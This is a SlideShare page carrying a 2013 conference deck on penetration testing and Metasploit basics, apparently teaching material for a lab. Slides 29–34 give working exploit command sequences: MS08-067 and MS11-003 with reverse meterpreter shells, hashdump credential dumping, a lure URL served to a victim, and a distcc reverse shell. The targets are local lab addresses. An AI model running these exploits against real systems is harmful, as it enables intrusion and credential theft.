Successfully reported this slideshow.

iCrOSS 2013_Pentest

3

Share

Jul. 14, 2013
3 likes 14,425 views
Upcoming SlideShare
Pentest with Metasploit
Pentest with Metasploit
Loading in …3
×
1 of 39
1 of 39

iCrOSS 2013_Pentest

Jul. 14, 2013
3 likes 14,425 views

3

Share

Download to read offline

Technology

[Slide] iCrOSS 2013_Pentest

[Slide] iCrOSS 2013_Pentest

Technology

Recommended

More Related Content

Slideshows for you

Metasploit framwork
Deepanshu Gajbhiye
SSMF (Security Scope Metasploit Framework) - Course Syllabus
Security Scope
Basic malware analysis
securityxploded
DC612 Day - Hands on Penetration Testing 101
dc612
Linux Security for Developers
Michael Boelen
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
Metaploit
Ajinkya Pathak
Penetration testing
Ashok Kumar
Tale of Forgotten Disclosure and Lesson learned
Anant Shrivastava
Automating malware analysis
Cysinfo Cyber Security Community
Ch0 1
TylerDerdun
Metasploit
Raghunath G
Justin collins - Practical Static Analysis for continuous application delivery
DevSecCon
When the internet bleeded : RootConf 2014
Anant Shrivastava
Reversing malware analysis training part7 unpackingupx
Cysinfo Cyber Security Community
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri
Penetration testing using metasploit
Aashish R
Automating Malware Analysis
securityxploded
Metasploit Framework Executable Encoding
technology_flow

Viewers also liked

Social Network Security & Backdooring email
M.Syarifudin, ST, OSCP, OSWP
Wireless LAN Security-Bimtek Kominfo
M.Syarifudin, ST, OSCP, OSWP
Information gath
M.Syarifudin, ST, OSCP, OSWP
Prepare Yourself to Become Infosec Professional
M.Syarifudin, ST, OSCP, OSWP
My pwk & oscp journey
M.Syarifudin, ST, OSCP, OSWP
IPTV Security
M.Syarifudin, ST, OSCP, OSWP

Similar to iCrOSS 2013_Pentest

Metasploit Exploitation Scenarios -EN : Scenario 2
Eric Romang
Iu report
Liên Hán
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
Zoltan Balazs
Pwning the Enterprise With PowerShell
Beau Bullock
Penetration Testing Boot CAMP
Shaikh Jamal Uddin l CISM, QRadar, Hack Card Recovery Expert
G3t R00t at IUT
Nahidul Kibria
Intrusion detection
Umesh Dhital
Ethical hacking presentation
Suryansh Srivastava
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
Ethicalhacking
Irvin Costa
Pentesting with Metasploit
Prakashchand Suthar
Firewalls (Distributed computing)
Sri Prasanna
Certified Ethical Hacking - Book Summary
udemy course
Hacking in shadows By - Raghav Bisht
Raghav Bisht
Ethical Hacking
Rishab garg
OS Fingerprinting
Rashmika Nawaratne
Enter The back|track Linux Dragon
Andrew Kozma
Ethical hacking for fun and profit
Florent Batard
1435488539 221998
Shree Krishna Shrestha
CEHv8 practice Exam with key
JahaSoft

Featured

What to Upload to SlideShare
SlideShare
Be A Great Product Leader (Amplify, Oct 2019)
Adam Nash
Trillion Dollar Coach Book (Bill Campbell)
Eric Schmidt
APIdays Paris 2019 - Innovation @ scale, APIs as Digital Factories' New Machi...
apidays
A few thoughts on work life-balance
Wim Vanderbauwhede
Is vc still a thing final
Mark Suster
The GaryVee Content Model
Gary Vaynerchuk
Mammalian Brain Chemistry Explains Everything
Loretta Breuning, PhD
Blockchain + AI + Crypto Economics Are We Creating a Code Tsunami?
Dinis Guarda
The AI Rush
Jean-Baptiste Dumont
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
Carol Smith
10 facts about jobs in the future
Pew Research Center's Internet & American Life Project
Harry Surden - Artificial Intelligence and Law Overview
Harry Surden
Inside Google's Numbers in 2017
Rand Fishkin
Pinot: Realtime Distributed OLAP datastore
Kishore Gopalakrishna
How to Become a Thought Leader in Your Niche
Leslie Samuel
Visual Design with Data
Seth Familian
Designing Teams for Emerging Challenges
Aaron Irizarry
UX, ethnography and possibilities: for Libraries, Museums and Archives
Ned Potter
Winners and Losers - All the (Russian) President's Men
Ian Bremmer

Related Books

Free with a 30 day trial from Scribd

See all
So You Want to Start a Podcast: Finding Your Voice, Telling Your Story, and Building a Community That Will Listen Kristen Meinzer
(3.5/5)
Free
SAM: One Robot, a Dozen Engineers, and the Race to Revolutionize the Way We Build Jonathan Waldman
(5/5)
Free
From Gutenberg to Google: The History of Our Future Tom Wheeler
(3.5/5)
Free
Talk to Me: How Voice Computing Will Transform the Way We Live, Work, and Think James Vlahos
(4/5)
Free
The Future Is Faster Than You Think: How Converging Technologies Are Transforming Business, Industries, and Our Lives Peter H. Diamandis
(4.5/5)
Free
Autonomy: The Quest to Build the Driverless Car—And How It Will Reshape Our World Lawrence D. Burns
(5/5)
Free
No Filter: The Inside Story of Instagram Sarah Frier
(4.5/5)
Free
Bezonomics: How Amazon Is Changing Our Lives and What the World's Best Companies Are Learning from It Brian Dumaine
(4/5)
Free
Live Work Work Work Die: A Journey into the Savage Heart of Silicon Valley Corey Pein
(4.5/5)
Free
Future Presence: How Virtual Reality Is Changing Human Connection, Intimacy, and the Limits of Ordinary Life Peter Rubin
(4/5)
Free
Life After Google: The Fall of Big Data and the Rise of the Blockchain Economy George Gilder
(4/5)
Free
Everybody Lies: Big Data, New Data, and What the Internet Can Tell Us About Who We Really Are Seth Stephens-Davidowitz
(4.5/5)
Free
Understanding Media: The Extensions of Man Marshall McLuhan
(4/5)
Free
How to Drive: Real World Instruction and Advice from Hollywood's Top Driver Ben Collins
(3.5/5)
Free
The Art of War Sun Tsu
(3/5)
Free
The Victorian Internet: The Remarkable Story of the Telegraph and the Nineteenth Century's On-line Pioneers Tom Standage
(3.5/5)
Free

Related Audiobooks

Free with a 30 day trial from Scribd

See all
The Quiet Zone: Unraveling the Mystery of a Town Suspended in Silence Stephen Kurczy
(4.5/5)
Free
System Error: Where Big Tech Went Wrong and How We Can Reboot Rob Reich
(4.5/5)
Free
The Wires of War: Technology and the Global Struggle for Power Jacob Helberg
(4/5)
Free
After Steve: How Apple Became a Trillion-Dollar Company and Lost its Soul Tripp Mickle
(4.5/5)
Free
Einstein's Fridge: How the Difference Between Hot and Cold Explains the Universe Paul Sen
(4.5/5)
Free
Dignity in a Digital Age: Making Tech Work for All of Us Ro Khanna
(4/5)
Free
Test Gods: Virgin Galactic and the Making of a Modern Astronaut Nicholas Schmidle
(5/5)
Free
Driven: The Race to Create the Autonomous Car Alex Davies
(4.5/5)
Free
Second Nature: Scenes from a World Remade Nathaniel Rich
(5/5)
Free
Spooked: The Trump Dossier, Black Cube, and the Rise of Private Spies Barry Meier
(4/5)
Free
A World Without Work: Technology, Automation, and How We Should Respond Daniel Susskind
(4.5/5)
Free
Lean Out: The Truth About Women, Power, and the Workplace Marissa Orr
(4.5/5)
Free
Uncanny Valley: A Memoir Anna Wiener
(4/5)
Free
Blockchain: The Next Everything Stephen P. Williams
(4/5)
Free
User Friendly: How the Hidden Rules of Design Are Changing the Way We Live, Work, and Play Cliff Kuang
(4/5)
Free
The Players Ball: A Genius, a Con Man, and the Secret History of the Internet's Rise David Kushner
(4.5/5)
Free

iCrOSS 2013_Pentest

  1. 1. PENETRATIONTESTINGAND METASPLOITBASIC Presented by Syarif ! Indonesia Creative Open Source Software ( ICrOSS ) 2013 Jakarta, April 25 2013 Balai Kartini
  2. 2. Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track basic overview • Information Gathering & Port Scan ( Demo) • Metasploit Basics & Meterpreter • Challenge ;)
  3. 3. Whoami • Just me my self : http://fl3x.us ; @fl3xu5 • InfoSec Enthusiast & Trainer • Lecture & Assistant Manager • CyberCrime Investigator
  4. 4. Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
  5. 5. What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail
  6. 6. Ethics • Think before act • Don’t be stupid • Don’t be malicious
  7. 7. Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting
  8. 8. << back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools
  9. 9. << back|track overview • Watch theVideo ! :)
  10. 10. << back|track overview
  11. 11. << back|track overview
  12. 12. What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based
  13. 13. Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
  14. 14. MSFconsole
  15. 15. MSFcli
  16. 16. Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)
  17. 17. How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data
  18. 18. Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest
  19. 19. Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation
  20. 20. Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell
  21. 21. Meterpreter command
  22. 22. Meterpreter command
  23. 23. Meterpreter command
  24. 24. Meterpreter command
  25. 25. Meterpreter command
  26. 26. Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *
  27. 27. Pentest Skenario • Set network adapter : NAT • Firewall & Windows update : OFF • Fresh OS installed ! • startx
  28. 28. OS in the Lab • BackTrack 5 R 3 • IP address : 172.16.150.169 • Windows Xp SP 2 • IP address : 172.16.150.165 • Windows 2003 Server • IP address : 172.16.150.167 • Windows 7 • IP address : 172.16.150.170 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.150.171
  29. 29. Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  30. 30. Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
  31. 31. Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  32. 32. Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.150.169:80/miyabi-hot.avi
  33. 33. Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
  34. 34. Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.150.171 • set lhost 172.16.150.169 • exploit
  35. 35. Any Question ? Contact me • Website : http://fl3x.us • Twitter : @fl3xu5
  36. 36. Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
  37. 37. References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines
  38. 38. Challenge in 45 minutes :) • ConnectYour Windows OS to TP LINK Access Point over dhcp • BackTrack 5R3VMWare setting : • Network adapter : Bridge • Get 4 Pictures by your self & shutdown the targets ( if you can :p ) • Win the Polo T-Shirt indobacktrack
  39. 39. Challenge in 45 minutes :)

×